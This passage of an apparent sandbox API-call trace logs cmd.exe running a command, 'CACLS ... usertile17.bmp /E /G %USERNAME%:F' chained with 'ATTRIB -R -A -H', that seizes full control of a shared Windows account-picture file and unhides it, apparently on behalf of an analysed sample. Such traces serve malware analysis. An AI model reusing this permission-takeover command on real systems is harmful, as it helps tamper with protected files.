0xa20 [0182.551] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa20) returned 0x38 [0182.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0182.552] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0182.552] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.552] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0182.552] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fdd4 | out: phkResult=0x24fdd4*=0x0) returned 0x2 [0182.552] VirtualQuery (in: lpAddress=0x24fe0b, lpBuffer=0x24fda4, dwLength=0x1c | out: lpBuffer=0x24fda4*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.552] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fda4, dwLength=0x1c | out: lpBuffer=0x24fda4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0182.552] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fda4, dwLength=0x1c | out: lpBuffer=0x24fda4*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0182.552] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fda4, dwLength=0x1c | out: lpBuffer=0x24fda4*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.552] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fda4, dwLength=0x1c | out: lpBuffer=0x24fda4*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0182.552] GetConsoleOutputCP () returned 0x1b5 [0182.552] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.552] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0182.552] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.552] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0182.553] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.553] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0182.553] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.553] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0182.553] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.553] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0182.553] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.553] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0182.553] GetEnvironmentStringsW () returned 0x3a0308* [0182.554] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0182.554] GetEnvironmentStringsW () returned 0x3a0308* [0182.554] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0182.554] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed44 | out: phkResult=0x24ed44*=0x40) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x0, lpData=0x24ed50*=0xb8, lpcbData=0x24ed48*=0x1000) returned 0x2 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x1, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x0, lpData=0x24ed50*=0x1, lpcbData=0x24ed48*=0x1000) returned 0x2 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x0, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x40, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x40, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x0, lpData=0x24ed50*=0x40, lpcbData=0x24ed48*=0x1000) returned 0x2 [0182.554] RegCloseKey (hKey=0x40) returned 0x0 [0182.554] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed44 | out: phkResult=0x24ed44*=0x40) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x0, lpData=0x24ed50*=0x40, lpcbData=0x24ed48*=0x1000) returned 0x2 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x1, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x0, lpData=0x24ed50*=0x1, lpcbData=0x24ed48*=0x1000) returned 0x2 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x0, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.555] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x9, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.555] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x9, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.555] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x0, lpData=0x24ed50*=0x9, lpcbData=0x24ed48*=0x1000) returned 0x2 [0182.555] RegCloseKey (hKey=0x40) returned 0x0 [0182.555] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886390 [0182.555] srand (_Seed=0x5b886390) [0182.555] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"" [0182.555] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"" [0182.555] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.555] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0182.555] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.556] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.556] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.556] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0182.556] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0182.556] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0182.556] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0182.556] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0182.556] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0182.556] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0182.556] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0182.556] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0182.556] GetEnvironmentStringsW () returned 0x3a2458* [0182.556] FreeEnvironmentStringsW (penv=0x3a2458) returned 1 [0182.556] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.556] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.556] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0182.556] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0182.556] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0182.556] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0182.556] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0182.556] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0182.556] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0182.556] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0182.556] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fb10 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.556] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fb10, lpFilePart=0x24fb0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fb0c*="Desktop") returned 0x18 [0182.557] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0182.557] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f88c | out: lpFindFileData=0x24f88c) returned 0x3a0ae8 [0182.557] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0182.557] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f88c | out: lpFindFileData=0x24f88c) returned 0x3a0ae8 [0182.557] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0182.557] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f88c | out: lpFindFileData=0x24f88c) returned 0x3a0ae8 [0182.557] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0182.557] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0182.557] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0182.557] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0182.558] GetEnvironmentStringsW () returned 0x3a0308* [0182.558] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0182.558] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.558] GetConsoleOutputCP () returned 0x1b5 [0182.559] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.559] GetUserDefaultLCID () returned 0x409 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fc50, cchData=128 | out: lpLCData="0") returned 2 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fc50, cchData=128 | out: lpLCData="0") returned 2 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fc50, cchData=128 | out: lpLCData="1") returned 2 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0182.561] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0182.561] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0182.561] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0182.561] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0182.562] GetConsoleTitleW (in: lpConsoleTitle=0x3909b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.562] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0182.562] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0182.562] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0182.562] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0182.563] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0182.563] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0182.563] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0182.563] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0182.563] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0182.564] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0182.564] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0182.564] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0182.567] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0182.567] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0182.567] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0182.567] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0182.567] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0182.567] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0182.567] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0182.570] GetConsoleTitleW (in: lpConsoleTitle=0x24f8e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.570] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0182.570] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0182.570] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0182.570] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0182.570] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0182.570] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0182.570] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0182.570] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0182.570] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0182.570] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0182.570] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0182.570] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0182.570] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0182.570] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0182.570] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0182.570] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0182.570] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0182.570] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0182.570] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0182.570] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0182.570] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0182.570] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0182.570] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0182.570] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0182.571] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0182.571] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0182.571] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0182.571] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0182.571] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0182.571] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0182.571] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0182.571] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0182.571] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0182.571] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0182.571] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0182.571] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0182.571] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0182.571] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0182.571] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0182.571] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0182.571] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0182.571] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0182.571] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0182.571] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0182.571] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0182.571] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0182.571] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0182.571] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0182.571] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0182.571] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0182.571] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0182.571] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0182.571] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0182.571] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0182.571] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0182.571] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0182.571] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0182.571] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0182.571] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0182.571] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0182.572] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0182.572] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0182.572] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0182.572] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0182.572] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0182.572] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0182.572] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0182.572] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0182.572] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0182.572] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0182.572] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0182.572] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0182.572] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0182.572] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0182.572] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0182.572] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0182.572] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0182.572] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0182.572] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0182.572] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0182.572] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0182.572] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0182.572] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0182.572] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0182.572] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0182.572] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0182.572] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0182.573] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0182.573] SetErrorMode (uMode=0x0) returned 0x0 [0182.573] SetErrorMode (uMode=0x1) returned 0x0 [0182.573] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a1e98, lpFilePart=0x24f404 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f404*="Desktop") returned 0x18 [0182.573] SetErrorMode (uMode=0x0) returned 0x1 [0182.573] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.573] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.580] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.580] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0xffffffff [0182.581] GetLastError () returned 0x2 [0182.581] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0xffffffff [0182.581] GetLastError () returned 0x2 [0182.581] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0x3a2180 [0182.581] FindClose (in: hFindFile=0x3a2180 | out: hFindFile=0x3a2180) returned 1 [0182.581] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0xffffffff [0182.582] GetLastError () returned 0x2 [0182.582] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0x3a2180 [0182.582] FindClose (in: hFindFile=0x3a2180 | out: hFindFile=0x3a2180) returned 1 [0182.582] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.582] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.582] GetConsoleTitleW (in: lpConsoleTitle=0x24f678, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.582] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f500, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f5c8 | out: lpAttributeList=0x24f500, lpSize=0x24f5c8) returned 1 [0182.582] UpdateProcThreadAttribute (in: lpAttributeList=0x24f500, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f5c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f500, lpPreviousValue=0x0) returned 1 [0182.582] GetStartupInfoW (in: lpStartupInfo=0x24f4bc | out: lpStartupInfo=0x24f4bc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0182.582] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.583] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f55c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G EEBsYm5:F /C ", 